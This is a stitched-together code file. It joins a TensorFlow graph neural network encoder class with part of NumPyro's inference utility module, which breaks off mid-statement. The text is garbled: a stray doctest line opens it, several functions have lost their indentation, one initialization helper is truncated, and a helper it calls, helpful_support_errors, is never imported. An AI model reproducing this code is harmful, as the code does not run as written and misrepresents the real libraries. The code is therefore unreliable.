    doctest.testmod(optionflags=doctest.ELLIPSIS)
| """GNN Encoder class."""
from itertools import count
from typing import Any, Dict, NamedTuple, List, Tuple, Optional
import tensorflow as tf
from dpu_utils.tf2utils import MLP
from tf2_gnn.utils.param_helpers import get_activation_function
from .message_passing import (
MessagePassing,
MessagePassingInput,
get_message_passing_class,
)
from .graph_global_exchange import (
GraphGlobalExchangeInput,
GraphGlobalExchange,
GraphGlobalMeanExchange,
GraphGlobalGRUExchange,
GraphGlobalMLPExchange,
)
from .nodes_to_graph_representation import (
WeightedSumGraphRepresentation,
NodesToGraphRepresentationInput,
)
class GNNInput(NamedTuple):
    """Input named tuple for the GNN."""

    # Float tensor of shape [V, D]: initial representation of each node in the batch.
    node_features: tf.Tensor
    # One int tensor of shape [E, 2] per edge type; row [v, u] is an edge from v to u.
    adjacency_lists: Tuple[tf.Tensor, ...]
    # Int tensor of shape [V] mapping each node to the index of its graph in the batch.
    node_to_graph_map: tf.Tensor
    # Scalar int tensor: the number of graphs in the batch.
    num_graphs: tf.Tensor
class GNN(tf.keras.layers.Layer):
    """Encode graph states using a combination of graph message passing layers and dense layers

    Example usage:
    >>> layer_input = GNNInput(
    ...     node_features = tf.random.normal(shape=(5, 3)),
    ...     adjacency_lists = (
    ...         tf.constant([[0, 1], [1, 2], [3, 4]], dtype=tf.int32),
    ...         tf.constant([[1, 2], [3, 4]], dtype=tf.int32),
    ...         tf.constant([[2, 0]], dtype=tf.int32)
    ...     ),
    ...     node_to_graph_map = tf.fill(dims=(5,), value=0),
    ...     num_graphs = 1,
    ... )
    ...
    >>> params = GNN.get_default_hyperparameters()
    >>> params["hidden_dim"] = 12
    >>> layer = GNN(params)
    >>> output = layer(layer_input)
    >>> print(output)
    tf.Tensor(..., shape=(5, 12), dtype=float32)
    """

    @classmethod
    def get_default_hyperparameters(cls, mp_style: Optional[str] = None) -> Dict[str, Any]:
        """Get the default hyperparameter dictionary for the class."""
        these_hypers = {
            "message_calculation_class": "rgcn",
            "initial_node_representation_activation": "tanh",
            "dense_intermediate_layer_activation": "tanh",
            "num_layers": 4,
            "dense_every_num_layers": 2,
            "residual_every_num_layers": 2,
            "use_inter_layer_layernorm": False,
            "hidden_dim": 16,
            "layer_input_dropout_rate": 0.0,
            "global_exchange_mode": "gru",  # One of "mean", "mlp", "gru"
            "global_exchange_every_num_layers": 2,
            "global_exchange_weighting_fun": "softmax",  # One of "softmax", "sigmoid"
            "global_exchange_num_heads": 4,
            "global_exchange_dropout_rate": 0.2,
        }  # type: Dict[str, Any]
        if mp_style is not None:
            these_hypers["message_calculation_class"] = mp_style
        message_passing_class = get_message_passing_class(
            these_hypers["message_calculation_class"]
        )
        # GNN-level hyperparameters override same-named message passing defaults.
        message_passing_hypers = message_passing_class.get_default_hyperparameters()
        message_passing_hypers.update(these_hypers)
        return message_passing_hypers

    def __init__(self, params: Dict[str, Any]):
        """Initialise the layer.

        Args:
            params: Hyperparameter dict; see `get_default_hyperparameters`.

        Raises:
            ValueError: If `params["global_exchange_mode"]` is not one of
                "mean", "mlp", "gru" (case-insensitive).
        """
        super().__init__()
        self._params = params
        self._hidden_dim = params["hidden_dim"]
        self._num_layers = params["num_layers"]
        self._dense_every_num_layers = params["dense_every_num_layers"]
        self._residual_every_num_layers = params["residual_every_num_layers"]
        self._use_inter_layer_layernorm = params["use_inter_layer_layernorm"]
        self._initial_node_representation_activation_fn = get_activation_function(
            params["initial_node_representation_activation"]
        )
        self._dense_intermediate_layer_activation_fn = get_activation_function(
            params["dense_intermediate_layer_activation"]
        )
        self._message_passing_class = get_message_passing_class(
            params["message_calculation_class"]
        )
        if not params["global_exchange_mode"].lower() in {"mean", "mlp", "gru"}:
            raise ValueError(
                f"Unknown global_exchange_mode mode {params['global_exchange_mode']} - has to be one of 'mean', 'mlp', 'gru'!"
            )
        self._global_exchange_mode = params["global_exchange_mode"]
        self._global_exchange_every_num_layers = params["global_exchange_every_num_layers"]
        self._global_exchange_weighting_fun = params["global_exchange_weighting_fun"]
        self._global_exchange_num_heads = params["global_exchange_num_heads"]
        self._global_exchange_dropout_rate = params["global_exchange_dropout_rate"]

        # Layer member variables. To be filled in in the `build` method.
        self._initial_projection_layer: Optional[tf.keras.layers.Layer] = None
        self._mp_layers: List[MessagePassing] = []
        self._inter_layer_layernorms: List[tf.keras.layers.Layer] = []
        # Dense and global-exchange sublayers only exist for some layers, so
        # they are keyed by str(layer_idx).
        self._dense_layers: Dict[str, tf.keras.layers.Layer] = {}
        self._global_exchange_layers: Dict[str, GraphGlobalExchange] = {}

    def build(self, tensor_shapes: GNNInput):
        """Build the various layers in the model.

        Args:
            tensor_shapes: A GNNInput of tensor shapes.

        Returns:
            Nothing, but initialises the layers in the model based on the tensor shapes given.
        """
        # First, we go through the input shapes and make sure that anything which might vary batch
        # to batch (number of nodes / number of edges) is set to None.
        initial_node_features_shape: tf.TensorShape = tensor_shapes.node_features
        variable_node_features_shape = tf.TensorShape((None, initial_node_features_shape[1]))
        adjacency_list_shapes = tensor_shapes.adjacency_lists
        embedded_shape = tf.TensorShape((None, self._hidden_dim))

        with tf.name_scope(f"{self._message_passing_class.__name__}_GNN"):
            # Then we construct the layers themselves:
            with tf.name_scope("gnn_initial_node_projection"):
                self._initial_projection_layer = tf.keras.layers.Dense(
                    units=self._hidden_dim,
                    use_bias=False,
                    activation=self._initial_node_representation_activation_fn,
                )
                self._initial_projection_layer.build(variable_node_features_shape)

            # Construct the graph message passing layers.
            for layer_idx in range(self._num_layers):
                with tf.name_scope(f"Layer_{layer_idx}"):
                    with tf.name_scope("MessagePassing"):
                        self._mp_layers.append(
                            self._message_passing_class(self._params)
                        )
                        self._mp_layers[-1].build(
                            MessagePassingInput(embedded_shape, adjacency_list_shapes)
                        )

                    # If required, prepare for a LayerNorm:
                    if self._use_inter_layer_layernorm:
                        with tf.name_scope(f"LayerNorm"):
                            self._inter_layer_layernorms.append(
                                tf.keras.layers.LayerNormalization()
                            )
                            self._inter_layer_layernorms[-1].build(embedded_shape)

                    # Construct the per-node dense layers.
                    if layer_idx % self._dense_every_num_layers == 0:
                        with tf.name_scope(f"Dense"):
                            self._dense_layers[str(layer_idx)] = tf.keras.layers.Dense(
                                units=self._hidden_dim,
                                use_bias=False,
                                activation=self._dense_intermediate_layer_activation_fn,
                            )
                            self._dense_layers[str(layer_idx)].build(embedded_shape)

                    # Global exchange layers are skipped for layer 0.
                    if (
                        layer_idx
                        and layer_idx % self._global_exchange_every_num_layers == 0
                    ):
                        with tf.name_scope(f"Global_Exchange"):
                            if self._global_exchange_mode.lower() == "mean":
                                exchange_layer_class = GraphGlobalMeanExchange
                            elif self._global_exchange_mode.lower() == "gru":
                                exchange_layer_class = GraphGlobalGRUExchange
                            elif self._global_exchange_mode.lower() == "mlp":
                                exchange_layer_class = GraphGlobalMLPExchange
                            exchange_layer = exchange_layer_class(
                                hidden_dim=self._hidden_dim,
                                weighting_fun=self._global_exchange_weighting_fun,
                                num_heads=self._global_exchange_num_heads,
                                dropout_rate=self._global_exchange_dropout_rate,
                            )
                            exchange_layer.build(
                                GraphGlobalExchangeInput(
                                    node_embeddings=tf.TensorShape(
                                        (None, self._hidden_dim)
                                    ),
                                    node_to_graph_map=tf.TensorShape((None,)),
                                    num_graphs=tf.TensorShape(()),
                                )
                            )
                            self._global_exchange_layers[
                                str(layer_idx)
                            ] = exchange_layer

        super().build(tensor_shapes)

        # Wrap `call` in a tf.function with a fixed input signature so varying
        # batch sizes do not trigger retracing.
        call_input_spec = (
            GNNInput(
                node_features=tf.TensorSpec(shape=variable_node_features_shape, dtype=tf.float32),
                adjacency_lists=tuple(
                    tf.TensorSpec(shape=(None, 2), dtype=tf.int32)
                    for _ in range(len(adjacency_list_shapes))
                ),
                node_to_graph_map=tf.TensorSpec(shape=(None,), dtype=tf.int32),
                num_graphs=tf.TensorSpec(shape=(), dtype=tf.int32),
            ),
            tf.TensorSpec(shape=(), dtype=tf.bool),
        )
        setattr(self, "call", tf.function(func=self.call, input_signature=call_input_spec))

    def call(self, inputs: GNNInput, training: bool = False):
        """
        Args:
            inputs: A GNNInput containing the following fields:
                node_features: float32 tensor of shape [V, D], the original representation
                    of each node in the graph.
                adjacency_lists: an tuple of tensors of shape [E, 2] which represents an adjacency
                    list for a given edge type. Concretely,
                        adjacency_list[l][k,:] == [v, u]
                    means that the k-th edge of type l connects node v to node u.
                node_to_graph_map: int32 tensor of shape [V], where node_to_graph_map[v] = i
                    means that node v belongs to graph i in the batch.
                num_graphs: int32 tensor of shape [], specifying number of graphs in batch.
            training: A bool representing whether the model is training or evaluating.

        Returns:
            A tensor of shape [V, hidden_dim], where hidden_dim was defined in the layer
            initialisation. The tensor represents the encoding of the initial node_features by the
            GNN framework.
        """
        initial_node_features: tf.Tensor = inputs.node_features
        adjacency_lists = inputs.adjacency_lists
        cur_node_representations = self._initial_projection_layer(initial_node_features)

        # Layer loop.
        last_node_representations = cur_node_representations
        for layer_idx, mp_layer in enumerate(self._mp_layers):
            if training:
                cur_node_representations = tf.nn.dropout(
                    cur_node_representations, rate=self._params["layer_input_dropout_rate"]
                )

            # Pass residuals through: average the current representation with
            # the one saved at the previous residual point.
            if layer_idx % self._residual_every_num_layers == 0:
                tmp = cur_node_representations
                if layer_idx > 0:
                    cur_node_representations += last_node_representations
                    cur_node_representations /= 2
                last_node_representations = tmp

            # Apply this message passing layer.
            cur_node_representations = mp_layer(
                MessagePassingInput(
                    node_embeddings=cur_node_representations, adjacency_lists=adjacency_lists
                ),
                training=training,
            )

            if layer_idx and layer_idx % self._global_exchange_every_num_layers == 0:
                cur_node_representations = self._global_exchange_layers[str(layer_idx)](
                    GraphGlobalExchangeInput(
                        node_embeddings=cur_node_representations,
                        node_to_graph_map=inputs.node_to_graph_map,
                        num_graphs=inputs.num_graphs,
                    ),
                    training=training,
                )

            # If required, apply a LayerNorm:
            if self._use_inter_layer_layernorm:
                cur_node_representations = self._inter_layer_layernorms[layer_idx](
                    cur_node_representations
                )

            # Apply dense layer, if needed.
            if layer_idx % self._dense_every_num_layers == 0:
                cur_node_representations = self._dense_layers[str(layer_idx)](
                    cur_node_representations, training=training
                )

        return cur_node_representations
if __name__ == "__main__":
    # Run the doctest embedded in the GNN class docstring; ELLIPSIS lets the
    # example's abbreviated tensor output match.
    import doctest

    doctest.testmod(optionflags=doctest.ELLIPSIS)
|
# Copyright Contributors to the Pyro project.
# SPDX-License-Identifier: Apache-2.0
from collections import namedtuple
from contextlib import contextmanager
from functools import partial
import warnings
import numpy as np
from jax import device_get, jacfwd, lax, random, value_and_grad
from jax.flatten_util import ravel_pytree
import jax.numpy as jnp
from jax.tree_util import tree_map
import numpyro
from numpyro.distributions import constraints
from numpyro.distributions.transforms import biject_to
from numpyro.distributions.util import is_identically_one, sum_rightmost
from numpyro.handlers import condition, replay, seed, substitute, trace
from numpyro.infer.initialization import init_to_uniform, init_to_value
from numpyro.util import not_jax_tracer, soft_vmap, while_loop
# Public API of this module.
__all__ = [
    "find_valid_initial_params",
    "get_potential_fn",
    "log_density",
    "log_likelihood",
    "potential_energy",
    "initialize_model",
    "Predictive",
]
# Bundle returned when setting up inference: initial parameter info, the
# potential function, the sample post-processing function, and the model trace.
ModelInfo = namedtuple(
    "ModelInfo", ["param_info", "potential_fn", "postprocess_fn", "model_trace"]
)
# Latent values `z` together with their potential energy and its gradient.
ParamInfo = namedtuple("ParamInfo", ["z", "potential_energy", "z_grad"])
def log_density(model, model_args, model_kwargs, params):
    """
    (EXPERIMENTAL INTERFACE) Computes log of joint density for the model given
    latent values ``params``.

    :param model: Python callable containing NumPyro primitives.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict params: dictionary of current parameter values keyed by site
        name.
    :return: log of joint density and a corresponding model trace
    """
    substituted_model = substitute(model, data=params)
    model_trace = trace(substituted_model).get_trace(*model_args, **model_kwargs)
    log_joint = jnp.zeros(())
    for site in model_trace.values():
        if site["type"] != "sample":
            continue
        value = site["value"]
        intermediates = site["intermediates"]
        # Transformed distributions carry intermediates that log_prob needs.
        if intermediates:
            site_log_prob = site["fn"].log_prob(value, intermediates)
        else:
            site_log_prob = site["fn"].log_prob(value)
        scale = site["scale"]
        if scale is not None and not is_identically_one(scale):
            site_log_prob = scale * site_log_prob
        log_joint = log_joint + jnp.sum(site_log_prob)
    return log_joint, model_trace
class _without_rsample_stop_gradient(numpyro.primitives.Messenger):
    """
    Stop gradient for samples at latent sample sites for which has_rsample=False.
    """

    def postprocess_message(self, msg):
        # Only non-observed sample sites whose distribution lacks a
        # reparameterized sampler get their value detached from the graph.
        if (
            msg["type"] == "sample"
            and (not msg["is_observed"])
            and (not msg["fn"].has_rsample)
        ):
            msg["value"] = lax.stop_gradient(msg["value"])
            # TODO: reconsider this logic
            # here we clear all the cached value so that gradients of log_prob(value) w.r.t.
            # all parameters of the transformed distributions match the behavior of
            # TransformedDistribution(d, transform) in Pyro with transform.cache_size == 0
            msg["intermediates"] = None
def get_importance_trace(model, guide, args, kwargs, params):
    """
    (EXPERIMENTAL) Returns traces from the guide and the model that is run against it.
    The returned traces also store the log probability at each site.

    .. note:: Gradients are blocked at latent sites which do not have reparametrized samplers.
    """

    def _site_log_prob(site):
        # Log probability of the site's value, honoring intermediates and scale.
        value = site["value"]
        intermediates = site["intermediates"]
        if intermediates:
            lp = site["fn"].log_prob(value, intermediates)
        else:
            lp = site["fn"].log_prob(value)
        scale = site["scale"]
        if (scale is not None) and (not is_identically_one(scale)):
            lp = scale * lp
        return lp

    substituted_guide = substitute(guide, data=params)
    with _without_rsample_stop_gradient():
        guide_trace = trace(substituted_guide).get_trace(*args, **kwargs)
    replayed_model = substitute(replay(model, guide_trace), data=params)
    model_trace = trace(replayed_model).get_trace(*args, **kwargs)
    for tr in (guide_trace, model_trace):
        for site in tr.values():
            if site["type"] == "sample" and "log_prob" not in site:
                site["log_prob"] = _site_log_prob(site)
    return model_trace, guide_trace
def transform_fn(transforms, params, invert=False):
    """
    (EXPERIMENTAL INTERFACE) Callable that applies a transformation from the `transforms`
    dict to values in the `params` dict and returns the transformed values keyed on
    the same names.

    :param transforms: Dictionary of transforms keyed by names. Names in
        `transforms` and `params` should align.
    :param params: Dictionary of arrays keyed by names.
    :param invert: Whether to apply the inverse of the transforms.
    :return: `dict` of transformed params.
    """
    if invert:
        # swap every transform for its inverse up front
        transforms = {name: t.inv for name, t in transforms.items()}
    transformed = {}
    for name, value in params.items():
        transformed[name] = transforms[name](value) if name in transforms else value
    return transformed
def constrain_fn(model, model_args, model_kwargs, params, return_deterministic=False):
    """
    (EXPERIMENTAL INTERFACE) Gets value at each latent site in `model` given
    unconstrained parameters `params`. The `transforms` is used to transform these
    unconstrained parameters to base values of the corresponding priors in `model`.
    If a prior is a transformed distribution, the corresponding base value lies in
    the support of base distribution. Otherwise, the base value lies in the support
    of the distribution.

    :param model: a callable containing NumPyro primitives.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict params: dictionary of unconstrained values keyed by site
        names.
    :param bool return_deterministic: whether to return the value of `deterministic`
        sites from the model. Defaults to `False`.
    :return: `dict` of transformed params.
    """

    def substitute_fn(site):
        # Only substitute sites the caller provided values for; sample sites
        # get their unconstrained value mapped into the distribution's support.
        name = site["name"]
        if name not in params:
            return None
        if site["type"] != "sample":
            return params[name]
        with helpful_support_errors(site):
            return biject_to(site["fn"].support)(params[name])

    substituted_model = substitute(model, substitute_fn=substitute_fn)
    model_trace = trace(substituted_model).get_trace(*model_args, **model_kwargs)
    constrained = {}
    for name, site in model_trace.items():
        if name in params or (
            return_deterministic and site["type"] == "deterministic"
        ):
            constrained[name] = site["value"]
    return constrained
def _unconstrain_reparam(params, site):
    """Substitute-fn mapping an unconstrained value from ``params`` into the
    support of ``site``'s distribution, registering the log-det-Jacobian
    correction via ``numpyro.factor`` so the traced density stays consistent.

    Returns None (no substitution) for sites not present in ``params``.
    """
    name = site["name"]
    if name in params:
        p = params[name]
        support = site["fn"].support
        with helpful_support_errors(site):
            t = biject_to(support)
        # in scan, we might only want to substitute an item at index i, rather than the whole sequence
        i = site["infer"].get("_scan_current_index", None)
        if i is not None:
            event_dim_shift = t.codomain.event_dim - t.domain.event_dim
            expected_unconstrained_dim = len(site["fn"].shape()) - event_dim_shift
            # check if p has additional time dimension
            if jnp.ndim(p) > expected_unconstrained_dim:
                p = p[i]
        if support in [constraints.real, constraints.real_vector]:
            # identity transform: no Jacobian correction required
            return p
        value = t(p)
        # change-of-variables correction, reduced over the event dimensions
        log_det = t.log_abs_det_jacobian(p, value)
        log_det = sum_rightmost(
            log_det, jnp.ndim(log_det) - jnp.ndim(value) + len(site["fn"].event_shape)
        )
        if site["scale"] is not None:
            log_det = site["scale"] * log_det
        # record the correction as a factor site so log_density picks it up
        numpyro.factor("_{}_log_det".format(name), log_det)
        return value
def potential_energy(model, model_args, model_kwargs, params, enum=False):
    """
    (EXPERIMENTAL INTERFACE) Computes potential energy of a model given unconstrained params.
    Under the hood, we will transform these unconstrained parameters to the values
    belong to the supports of the corresponding priors in `model`.

    :param model: a callable containing NumPyro primitives.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict params: unconstrained parameters of `model`.
    :param bool enum: whether to enumerate over discrete latent sites.
    :return: potential energy given unconstrained parameters.
    """
    if enum:
        from numpyro.contrib.funsor import log_density as log_density_
    else:
        log_density_ = log_density
    # Map unconstrained params into each site's support while tracing; the
    # substitute_fn also registers the log-det-Jacobian factors.
    substituted_model = substitute(
        model, substitute_fn=partial(_unconstrain_reparam, params)
    )
    # no param is needed for log_density computation because we already substitute
    log_joint, _ = log_density_(substituted_model, model_args, model_kwargs, {})
    return -log_joint
def _init_to_unconstrained_value(site=None, values={}):
if site is None:
return partial(_init_to_unconstrained_value, values=values)
def find_valid_initial_params(
    rng_key,
    model,
    *,
    init_strategy=init_to_uniform,
    enum=False,
    model_args=(),
    model_kwargs=None,
    prototype_params=None,
    forward_mode_differentiation=False,
    validate_grad=True,
):
    """
    (EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns an initial
    valid unconstrained value for all the parameters. This function also returns
    the corresponding potential energy, the gradients, and an
    `is_valid` flag to say whether the initial parameters are valid. Parameter values
    are considered valid if the values and the gradients for the log density have
    finite values.

    :param jax.random.PRNGKey rng_key: random number generator seed to
        sample from the prior. The returned `init_params` will have the
        batch shape ``rng_key.shape[:-1]``.
    :param model: Python callable containing Pyro primitives.
    :param callable init_strategy: a per-site initialization function.
    :param bool enum: whether to enumerate over discrete latent sites.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param dict prototype_params: an optional prototype parameters, which is used
        to define the shape for initial parameters.
    :param bool forward_mode_differentiation: whether to use forward-mode differentiation
        or reverse-mode differentiation. Defaults to False.
    :param bool validate_grad: whether to validate gradient of the initial params.
        Defaults to True.
    :return: tuple of `init_params_info` and `is_valid`, where `init_params_info` is the tuple
        containing the initial params, their potential energy, and their gradients.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    init_strategy = (
        init_strategy if isinstance(init_strategy, partial) else init_strategy()
    )
    # handle those init strategies differently to save computation
    if init_strategy.func is init_to_uniform:
        radius = init_strategy.keywords.get("radius")
        init_values = {}
    elif init_strategy.func is _init_to_unconstrained_value:
        radius = 2
        init_values = init_strategy.keywords.get("values")
    else:
        # radius=None forces the trace-based sampling branch in body_fn below
        radius = None

    def cond_fn(state):
        # retry up to 100 draws until a finite (params, pe, grad) triple is found
        i, _, _, is_valid = state
        return (i < 100) & (~is_valid)

    def body_fn(state):
        i, key, _, _ = state
        key, subkey = random.split(key)

        if radius is None or prototype_params is None:
            # Trace-based draw: run the seeded model under the init strategy.
            # XXX: we don't want to apply enum to draw latent samples
            model_ = model
            if enum:
                from numpyro.contrib.funsor import enum as enum_handler

                if isinstance(model, substitute) and isinstance(model.fn, enum_handler):
                    model_ = substitute(model.fn.fn, data=model.data)
                elif isinstance(model, enum_handler):
                    model_ = model.fn

            # Wrap model in a `substitute` handler to initialize from `init_loc_fn`.
            seeded_model = substitute(seed(model_, subkey), substitute_fn=init_strategy)
            model_trace = trace(seeded_model).get_trace(*model_args, **model_kwargs)
            constrained_values, inv_transforms = {}, {}
            # collect continuous latent values and their support bijections
            for k, v in model_trace.items():
                if (
                    v["type"] == "sample"
                    and not v["is_observed"]
                    and not v["fn"].is_discrete
                ):
                    constrained_values[k] = v["value"]
                    with helpful_support_errors(v):
                        inv_transforms[k] = biject_to(v["fn"].support)
            # map the constrained draws back to unconstrained space
            params = transform_fn(
                inv_transforms,
                {k: v for k, v in constrained_values.items()},
                invert=True,
            )
        else:  # this branch doesn't require tracing the model
            params = {}
            for k, v in prototype_params.items():
                if k in init_values:
                    params[k] = init_values[k]
                else:
                    # uniform draw in the unconstrained box [-radius, radius]
                    params[k] = random.uniform(
                        subkey, jnp.shape(v), minval=-radius, maxval=radius
                    )
                    key, subkey = random.split(key)

        potential_fn = partial(
            potential_energy, model, model_args, model_kwargs, enum=enum
        )
        if validate_grad:
            if forward_mode_differentiation:
                pe = potential_fn(params)
                z_grad = jacfwd(potential_fn)(params)
            else:
                pe, z_grad = value_and_grad(potential_fn)(params)
            z_grad_flat = ravel_pytree(z_grad)[0]
            # valid only if the energy AND every gradient entry are finite
            is_valid = jnp.isfinite(pe) & jnp.all(jnp.isfinite(z_grad_flat))
        else:
            pe = potential_fn(params)
            is_valid = jnp.isfinite(pe)
            z_grad = None

        return i + 1, key, (params, pe, z_grad), is_valid

    def _find_valid_params(rng_key, exit_early=False):
        init_state = (0, rng_key, (prototype_params, 0.0, prototype_params), False)
        if exit_early and not_jax_tracer(rng_key):
            # Early return if valid params found. This is only helpful for single chain,
            # where we can avoid compiling body_fn in while_loop.
            _, _, (init_params, pe, z_grad), is_valid = init_state = body_fn(init_state)
            if not_jax_tracer(is_valid):
                if device_get(is_valid):
                    return (init_params, pe, z_grad), is_valid

        # XXX: this requires compiling the model, so for multi-chain, we trace the model 2-times
        # even if the init_state is a valid result
        _, _, (init_params, pe, z_grad), is_valid = while_loop(
            cond_fn, body_fn, init_state
        )
        return (init_params, pe, z_grad), is_valid

    # Handle possible vectorization: a batch of keys means one search per chain
    if rng_key.ndim == 1:
        (init_params, pe, z_grad), is_valid = _find_valid_params(
            rng_key, exit_early=True
        )
    else:
        (init_params, pe, z_grad), is_valid = lax.map(_find_valid_params, rng_key)
    return (init_params, pe, z_grad), is_valid
def _get_model_transforms(model, model_args=(), model_kwargs=None):
    """Trace ``model`` once and collect, per continuous latent site, the
    bijection from unconstrained space onto the site's support.

    :param model: Python callable containing Pyro primitives.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :return: tuple ``(inv_transforms, replay_model, has_enumerate_support,
        model_trace)``; ``replay_model`` is True when the model must be re-run
        to recover constrained values (deterministic sites or supports with
        traced, non-static bounds), ``has_enumerate_support`` flags discrete
        latent sites.
    :raises RuntimeError: if a discrete latent site lacks enumerate support.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    model_trace = trace(model).get_trace(*model_args, **model_kwargs)
    inv_transforms = {}
    # model code may need to be replayed in the presence of deterministic sites
    replay_model = False
    has_enumerate_support = False
    for k, v in model_trace.items():
        if v["type"] == "sample" and not v["is_observed"]:
            if v["fn"].is_discrete:
                has_enumerate_support = True
                if not v["fn"].has_enumerate_support:
                    # BUG FIX: the original nested double quotes inside a
                    # double-quoted f-string -- a SyntaxError before Py3.12.
                    raise RuntimeError(
                        "MCMC only supports continuous sites or discrete sites "
                        f"with enumerate support, but got {type(v['fn']).__name__}."
                    )
            else:
                support = v["fn"].support
                with helpful_support_errors(v, raise_warnings=True):
                    inv_transforms[k] = biject_to(support)
                # XXX: the following code filters out most situations with dynamic supports
                args = ()
                if isinstance(support, constraints._GreaterThan):
                    args = ("lower_bound",)
                elif isinstance(support, constraints._Interval):
                    args = ("lower_bound", "upper_bound")
                for arg in args:
                    # a non-static bound means the support depends on traced
                    # values, so the model must be replayed in postprocessing
                    if not isinstance(getattr(support, arg), (int, float)):
                        replay_model = True
        elif v["type"] == "deterministic":
            replay_model = True
    return inv_transforms, replay_model, has_enumerate_support, model_trace
def get_potential_fn(
    model,
    inv_transforms,
    *,
    enum=False,
    replay_model=False,
    dynamic_args=False,
    model_args=(),
    model_kwargs=None,
):
    """
    (EXPERIMENTAL INTERFACE) Given a model with Pyro primitives, returns a
    function which, given unconstrained parameters, evaluates the potential
    energy (negative log joint density). In addition, this returns a
    function to transform unconstrained values at sample sites to constrained
    values within their respective support.

    :param model: Python callable containing Pyro primitives.
    :param dict inv_transforms: dictionary of transforms keyed by names.
    :param bool enum: whether to enumerate over discrete latent sites.
    :param bool replay_model: whether we need to replay model in
        `postprocess_fn` to obtain `deterministic` sites.
    :param bool dynamic_args: if `True`, the `potential_fn` and
        `constraints_fn` are themselves dependent on model arguments.
        When provided a `*model_args, **model_kwargs`, they return
        `potential_fn` and `constraints_fn` callables, respectively.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :return: tuple of (`potential_fn`, `postprocess_fn`). The latter is used
        to constrain unconstrained samples (e.g. those returned by HMC)
        to values that lie within the site's support, and return values at
        `deterministic` sites in the model.
    """
    if dynamic_args:
        # Both callables are factories: given model args, they produce the
        # actual potential / postprocess functions.
        def potential_fn(*args, **kwargs):
            return partial(potential_energy, model, args, kwargs, enum=enum)

        def postprocess_fn(*args, **kwargs):
            if not replay_model:
                return partial(transform_fn, inv_transforms)
            # XXX: we seed to sample discrete sites (but not collect them)
            model_ = seed(model.fn, 0) if enum else model
            return partial(
                constrain_fn, model_, args, kwargs, return_deterministic=True
            )

        return potential_fn, postprocess_fn

    model_kwargs = {} if model_kwargs is None else model_kwargs
    potential_fn = partial(
        potential_energy, model, model_args, model_kwargs, enum=enum
    )
    if replay_model:
        # XXX: we seed to sample discrete sites (but not collect them)
        model_ = seed(model.fn, 0) if enum else model
        postprocess_fn = partial(
            constrain_fn,
            model_,
            model_args,
            model_kwargs,
            return_deterministic=True,
        )
    else:
        postprocess_fn = partial(transform_fn, inv_transforms)
    return potential_fn, postprocess_fn
def _guess_max_plate_nesting(model_trace):
"""
Guesses max_plate_nesting by using model trace.
This optimistically assumes static model
structure.
"""
sites = [site for site in model_trace.values() if site["type"] == "sample"]
dims = [
frame.dim
for site in sites
for frame in site["cond_indep_stack"]
if frame.dim is not None
]
max_plate_nesting = -min(dims) if dims else 0
return max_plate_nesting
# TODO: follow pyro.util.check_site_shape logics for more complete validation
def _validate_model(model_trace):
# XXX: this validates plate statements under `enum`
sites = [site for site in model_trace.values() if site["type"] == "sample"]
for site in sites:
batch_dims = len(site["fn"].batch_shape)
if site.get("_control_flow_done", False):
batch_dims = batch_dims - 1 # remove time dimension under scan
plate_dims = -min([0] + [frame.dim for frame in site["cond_indep_stack"]])
assert (
plate_dims >= batch_dims
), "Missing plate statement for batch dimensions at site {}".format(
site["name"]
)
def initialize_model(
    rng_key,
    model,
    *,
    init_strategy=init_to_uniform,
    dynamic_args=False,
    model_args=(),
    model_kwargs=None,
    forward_mode_differentiation=False,
    validate_grad=True,
):
    """
    (EXPERIMENTAL INTERFACE) Helper function that calls :func:`~numpyro.infer.util.get_potential_fn`
    and :func:`~numpyro.infer.util.find_valid_initial_params` under the hood
    to return a tuple of (`init_params_info`, `potential_fn`, `postprocess_fn`, `model_trace`).

    :param jax.random.PRNGKey rng_key: random number generator seed to
        sample from the prior. The returned `init_params` will have the
        batch shape ``rng_key.shape[:-1]``.
    :param model: Python callable containing Pyro primitives.
    :param callable init_strategy: a per-site initialization function.
        See :ref:`init_strategy` section for available functions.
    :param bool dynamic_args: if `True`, the `potential_fn` and
        `constraints_fn` are themselves dependent on model arguments.
        When provided a `*model_args, **model_kwargs`, they return
        `potential_fn` and `constraints_fn` callables, respectively.
    :param tuple model_args: args provided to the model.
    :param dict model_kwargs: kwargs provided to the model.
    :param bool forward_mode_differentiation: whether to use forward-mode differentiation
        or reverse-mode differentiation. By default, we use reverse mode but the forward
        mode can be useful in some cases to improve the performance. In addition, some
        control flow utility on JAX such as `jax.lax.while_loop` or `jax.lax.fori_loop`
        only supports forward-mode differentiation. See
        `JAX's The Autodiff Cookbook <https://jax.readthedocs.io/en/latest/notebooks/autodiff_cookbook.html>`_
        for more information.
    :param bool validate_grad: whether to validate gradient of the initial params.
        Defaults to True.
    :return: a namedtupe `ModelInfo` which contains the fields
        (`param_info`, `potential_fn`, `postprocess_fn`, `model_trace`), where
        `param_info` is a namedtuple `ParamInfo` containing values from the prior
        used to initiate MCMC, their corresponding potential energy, and their gradients;
        `postprocess_fn` is a callable that uses inverse transforms
        to convert unconstrained HMC samples to constrained values that
        lie within the site's support, in addition to returning values
        at `deterministic` sites in the model.
    """
    model_kwargs = {} if model_kwargs is None else model_kwargs
    # Seed with a single key (the first one when vectorized over chains) so a
    # single prototype trace can be collected under the init strategy.
    substituted_model = substitute(
        seed(model, rng_key if jnp.ndim(rng_key) == 1 else rng_key[0]),
        substitute_fn=init_strategy,
    )
    (
        inv_transforms,
        replay_model,
        has_enumerate_support,
        model_trace,
    ) = _get_model_transforms(substituted_model, model_args, model_kwargs)
    # substitute param sites from model_trace to model so
    # we don't need to generate again parameters of `numpyro.module`
    model = substitute(
        model,
        data={
            k: site["value"]
            for k, site in model_trace.items()
            if site["type"] in ["param"]
        },
    )
    # continuous latent values from the prototype trace; these define the
    # shapes of the unconstrained prototype parameters below
    constrained_values = {
        k: v["value"]
        for k, v in model_trace.items()
        if v["type"] == "sample" and not v["is_observed"] and not v["fn"].is_discrete
